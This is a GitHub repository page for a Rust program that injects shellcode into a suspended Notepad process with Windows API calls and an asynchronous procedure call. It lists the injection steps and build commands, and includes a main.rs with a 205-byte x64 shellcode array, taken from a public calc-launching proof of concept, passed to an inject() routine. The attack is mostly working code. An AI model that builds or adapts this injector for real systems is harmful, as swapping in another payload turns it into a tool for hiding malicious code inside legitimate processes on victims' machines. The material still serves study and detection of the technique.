Skip to content

A simple example of shellcode injection in Rust using winapi

Notifications You must be signed in to change notification settings

Maherilaza/rust-shellcode-injection

Folders and files

NameName
Last commit message
Last commit date

Latest commit

3bc59de · Jan 24, 2025

History

11 Commits
Jan 24, 2025
Dec 27, 2024
Sep 22, 2024
Sep 22, 2024
Sep 22, 2024
Dec 27, 2024

Repository files navigation

Rust-shellcode-injection

Rust Platform License

A simple example of shellcode injection in Rust using [winapi]

  • The Notepad process is created in suspended mode.
  • Memory is allocated within the Notepad process for the shellcode.
  • The shellcode is written into the allocated memory space. eg : https://github.com/boku7/x64win-DynamicNoNull-WinExec-PopCalc-Shellcode
  • An asynchronous procedure call (APC) function is used to execute the shellcode.
  • The Notepad process thread is then resumed to start executing the shellcode.
git clone https://github.com/Maherilaza/rust-shellcode-injection
cd rust-shellcode-injection
cargo build --release 
use shellcode::utils::{*};
fn main() {

    // https://github.com/boku7/x64win-DynamicNoNull-WinExec-PopCalc-Shellcode
    const shellcode: [u8; 205] = [
        0x48, 0x31, 0xff, 0x48, 0xf7, 0xe7, 0x65, 0x48, 0x8b, 0x58, 0x60, 0x48, 0x8b, 0x5b, 0x18,
        0x48, 0x8b, 0x5b, 0x20, 0x48, 0x8b, 0x1b, 0x48, 0x8b, 0x1b, 0x48, 0x8b, 0x5b, 0x20, 0x49,
        0x89, 0xd8, 0x8b, 0x5b, 0x3c, 0x4c, 0x01, 0xc3, 0x48, 0x31, 0xc9, 0x66, 0x81, 0xc1, 0xff,
        0x88, 0x48, 0xc1, 0xe9, 0x08, 0x8b, 0x14, 0x0b, 0x4c, 0x01, 0xc2, 0x4d, 0x31, 0xd2, 0x44,
        0x8b, 0x52, 0x1c, 0x4d, 0x01, 0xc2, 0x4d, 0x31, 0xdb, 0x44, 0x8b, 0x5a, 0x20, 0x4d, 0x01,
        0xc3, 0x4d, 0x31, 0xe4, 0x44, 0x8b, 0x62, 0x24, 0x4d, 0x01, 0xc4, 0xeb, 0x32, 0x5b, 0x59,
        0x48, 0x31, 0xc0, 0x48, 0x89, 0xe2, 0x51, 0x48, 0x8b, 0x0c, 0x24, 0x48, 0x31, 0xff, 0x41,
        0x8b, 0x3c, 0x83, 0x4c, 0x01, 0xc7, 0x48, 0x89, 0xd6, 0xf3, 0xa6, 0x74, 0x05, 0x48, 0xff,
        0xc0, 0xeb, 0xe6, 0x59, 0x66, 0x41, 0x8b, 0x04, 0x44, 0x41, 0x8b, 0x04, 0x82, 0x4c, 0x01,
        0xc0, 0x53, 0xc3, 0x48, 0x31, 0xc9, 0x80, 0xc1, 0x07, 0x48, 0xb8, 0x0f, 0xa8, 0x96, 0x91,
        0xba, 0x87, 0x9a, 0x9c, 0x48, 0xf7, 0xd0, 0x48, 0xc1, 0xe8, 0x08, 0x50, 0x51, 0xe8, 0xb0,
        0xff, 0xff, 0xff, 0x49, 0x89, 0xc6, 0x48, 0x31, 0xc9, 0x48, 0xf7, 0xe1, 0x50, 0x48, 0xb8,
        0x9c, 0x9e, 0x93, 0x9c, 0xd1, 0x9a, 0x87, 0x9a, 0x48, 0xf7, 0xd0, 0x50, 0x48, 0x89, 0xe1,
        0x48, 0xff, 0xc2, 0x48, 0x83, 0xec, 0x20, 0x41, 0xff, 0xd6,
    ];


    let mut your_shellcode : Ushellcode = Ushellcode::new_shellcode(
        shellcode
    );

    your_shellcode.inject();
}

About

A simple example of shellcode injection in Rust using winapi

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages